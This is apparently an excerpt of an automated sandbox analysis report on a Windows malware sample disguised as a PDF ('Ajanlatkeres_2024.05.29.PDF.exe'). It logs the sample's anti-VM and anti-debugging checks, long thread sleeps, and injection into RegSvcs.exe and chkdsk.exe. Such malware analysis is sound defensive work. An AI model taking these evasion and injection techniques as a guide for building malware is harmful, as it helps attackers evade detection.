Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Memory allocated: 1610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Memory allocated: 4F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Memory allocated: 77C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Memory allocated: 87C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Memory allocated: 77C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

Code function: 6_2_0136C880 rdtsc

6_2_0136C880

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5947	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3796	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7449	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2098	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1068
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 8865
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 874
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 866
Source: C:\Windows\SysWOW64\chkdsk.exe	Window / User API: threadDelayed 3635
Source: C:\Windows\SysWOW64\chkdsk.exe	Window / User API: threadDelayed 6336

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_20-13919

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.6 %
Source: C:\Windows\SysWOW64\chkdsk.exe	API coverage: 1.7 %

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe TID: 7192	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe TID: 6072	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe TID: 7564	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3104	Thread sleep count: 1068 > 30
Source: C:\Windows\explorer.exe TID: 3104	Thread sleep time: -2136000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3104	Thread sleep count: 8865 > 30
Source: C:\Windows\explorer.exe TID: 3104	Thread sleep time: -17730000s >= -30000s
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7952	Thread sleep count: 3635 > 30
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7952	Thread sleep time: -7270000s >= -30000s
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7952	Thread sleep count: 6336 > 30
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7952	Thread sleep time: -12672000s >= -30000s

Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 15_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

15_2_00403D74

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be8M
Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1333140834.0000000007B26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqk<
Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.1348137626.000000000888E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
Source: explorer.exe, 00000014.00000003.3084622640.0000000008979000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00`
Source: explorer.exe, 00000014.00000000.1348137626.00000000088BA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Prod_VMware_SATA)
Source: explorer.exe, 00000014.00000000.1348137626.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000014.00000000.1348137626.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008796000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWe
Source: explorer.exe, 00000014.00000003.2297215475.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3086625508.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000014.00000002.3741150645.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
Source: explorer.exe, 00000014.00000000.1348137626.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
Source: RegSvcs.exe, 0000000F.00000002.3743055892.0000000000C68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000014.00000000.1348137626.00000000088E6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000014.00000000.1348137626.00000000088E6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
Source: explorer.exe, 00000014.00000002.3741150645.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000014.00000000.1348137626.00000000088E6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.1348137626.00000000088E6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000014.00000002.3741150645.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

Code function: 6_2_0136C880 rdtsc

6_2_0136C880

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 19_2_0040ACF0 LdrLoadDll,

19_2_0040ACF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0040317B mov eax, dword ptr fs:[00000030h]	15_2_0040317B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F420F0 mov ecx, dword ptr fs:[00000030h]	19_2_00F420F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFA0E3 mov ecx, dword ptr fs:[00000030h]	19_2_00EFA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F860E0 mov eax, dword ptr fs:[00000030h]	19_2_00F860E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F080E9 mov eax, dword ptr fs:[00000030h]	19_2_00F080E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFC0F0 mov eax, dword ptr fs:[00000030h]	19_2_00EFC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F820DE mov eax, dword ptr fs:[00000030h]	19_2_00F820DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC60B8 mov eax, dword ptr fs:[00000030h]	19_2_00FC60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC60B8 mov ecx, dword ptr fs:[00000030h]	19_2_00FC60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EF80A0 mov eax, dword ptr fs:[00000030h]	19_2_00EF80A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F980A8 mov eax, dword ptr fs:[00000030h]	19_2_00F980A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0208A mov eax, dword ptr fs:[00000030h]	19_2_00F0208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2C073 mov eax, dword ptr fs:[00000030h]	19_2_00F2C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F02050 mov eax, dword ptr fs:[00000030h]	19_2_00F02050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F86050 mov eax, dword ptr fs:[00000030h]	19_2_00F86050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F96030 mov eax, dword ptr fs:[00000030h]	19_2_00F96030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFA020 mov eax, dword ptr fs:[00000030h]	19_2_00EFA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFC020 mov eax, dword ptr fs:[00000030h]	19_2_00EFC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1E016 mov eax, dword ptr fs:[00000030h]	19_2_00F1E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1E016 mov eax, dword ptr fs:[00000030h]	19_2_00F1E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1E016 mov eax, dword ptr fs:[00000030h]	19_2_00F1E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1E016 mov eax, dword ptr fs:[00000030h]	19_2_00F1E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F84000 mov ecx, dword ptr fs:[00000030h]	19_2_00F84000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]	19_2_00FA2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]	19_2_00FA2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]	19_2_00FA2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]	19_2_00FA2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]	19_2_00FA2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]	19_2_00FA2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]	19_2_00FA2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]	19_2_00FA2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F301F8 mov eax, dword ptr fs:[00000030h]	19_2_00F301F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD61E5 mov eax, dword ptr fs:[00000030h]	19_2_00FD61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E1D0 mov eax, dword ptr fs:[00000030h]	19_2_00F7E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E1D0 mov eax, dword ptr fs:[00000030h]	19_2_00F7E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E1D0 mov ecx, dword ptr fs:[00000030h]	19_2_00F7E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E1D0 mov eax, dword ptr fs:[00000030h]	19_2_00F7E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E1D0 mov eax, dword ptr fs:[00000030h]	19_2_00F7E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC61C3 mov eax, dword ptr fs:[00000030h]	19_2_00FC61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC61C3 mov eax, dword ptr fs:[00000030h]	19_2_00FC61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8019F mov eax, dword ptr fs:[00000030h]	19_2_00F8019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8019F mov eax, dword ptr fs:[00000030h]	19_2_00F8019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8019F mov eax, dword ptr fs:[00000030h]	19_2_00F8019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8019F mov eax, dword ptr fs:[00000030h]	19_2_00F8019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F40185 mov eax, dword ptr fs:[00000030h]	19_2_00F40185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FBC188 mov eax, dword ptr fs:[00000030h]	19_2_00FBC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FBC188 mov eax, dword ptr fs:[00000030h]	19_2_00FBC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFA197 mov eax, dword ptr fs:[00000030h]	19_2_00EFA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFA197 mov eax, dword ptr fs:[00000030h]	19_2_00EFA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFA197 mov eax, dword ptr fs:[00000030h]	19_2_00EFA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA4180 mov eax, dword ptr fs:[00000030h]	19_2_00FA4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA4180 mov eax, dword ptr fs:[00000030h]	19_2_00FA4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD4164 mov eax, dword ptr fs:[00000030h]	19_2_00FD4164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD4164 mov eax, dword ptr fs:[00000030h]	19_2_00FD4164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F98158 mov eax, dword ptr fs:[00000030h]	19_2_00F98158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F06154 mov eax, dword ptr fs:[00000030h]	19_2_00F06154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F06154 mov eax, dword ptr fs:[00000030h]	19_2_00F06154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFC156 mov eax, dword ptr fs:[00000030h]	19_2_00EFC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F94144 mov eax, dword ptr fs:[00000030h]	19_2_00F94144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F94144 mov eax, dword ptr fs:[00000030h]	19_2_00F94144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F94144 mov ecx, dword ptr fs:[00000030h]	19_2_00F94144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F94144 mov eax, dword ptr fs:[00000030h]	19_2_00F94144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F94144 mov eax, dword ptr fs:[00000030h]	19_2_00F94144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F30124 mov eax, dword ptr fs:[00000030h]	19_2_00F30124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAA118 mov ecx, dword ptr fs:[00000030h]	19_2_00FAA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAA118 mov eax, dword ptr fs:[00000030h]	19_2_00FAA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAA118 mov eax, dword ptr fs:[00000030h]	19_2_00FAA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAA118 mov eax, dword ptr fs:[00000030h]	19_2_00FAA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC0115 mov eax, dword ptr fs:[00000030h]	19_2_00FC0115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]	19_2_00FAE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE10E mov ecx, dword ptr fs:[00000030h]	19_2_00FAE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]	19_2_00FAE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]	19_2_00FAE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE10E mov ecx, dword ptr fs:[00000030h]	19_2_00FAE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]	19_2_00FAE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]	19_2_00FAE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE10E mov ecx, dword ptr fs:[00000030h]	19_2_00FAE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]	19_2_00FAE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE10E mov ecx, dword ptr fs:[00000030h]	19_2_00FAE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F102E1 mov eax, dword ptr fs:[00000030h]	19_2_00F102E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F102E1 mov eax, dword ptr fs:[00000030h]	19_2_00F102E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F102E1 mov eax, dword ptr fs:[00000030h]	19_2_00F102E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD62D6 mov eax, dword ptr fs:[00000030h]	19_2_00FD62D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A2C3 mov eax, dword ptr fs:[00000030h]	19_2_00F0A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A2C3 mov eax, dword ptr fs:[00000030h]	19_2_00F0A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A2C3 mov eax, dword ptr fs:[00000030h]	19_2_00F0A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A2C3 mov eax, dword ptr fs:[00000030h]	19_2_00F0A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A2C3 mov eax, dword ptr fs:[00000030h]	19_2_00F0A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F102A0 mov eax, dword ptr fs:[00000030h]	19_2_00F102A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F102A0 mov eax, dword ptr fs:[00000030h]	19_2_00F102A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F962A0 mov eax, dword ptr fs:[00000030h]	19_2_00F962A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F962A0 mov ecx, dword ptr fs:[00000030h]	19_2_00F962A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F962A0 mov eax, dword ptr fs:[00000030h]	19_2_00F962A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F962A0 mov eax, dword ptr fs:[00000030h]	19_2_00F962A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F962A0 mov eax, dword ptr fs:[00000030h]	19_2_00F962A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F962A0 mov eax, dword ptr fs:[00000030h]	19_2_00F962A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E284 mov eax, dword ptr fs:[00000030h]	19_2_00F3E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E284 mov eax, dword ptr fs:[00000030h]	19_2_00F3E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F80283 mov eax, dword ptr fs:[00000030h]	19_2_00F80283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F80283 mov eax, dword ptr fs:[00000030h]	19_2_00F80283
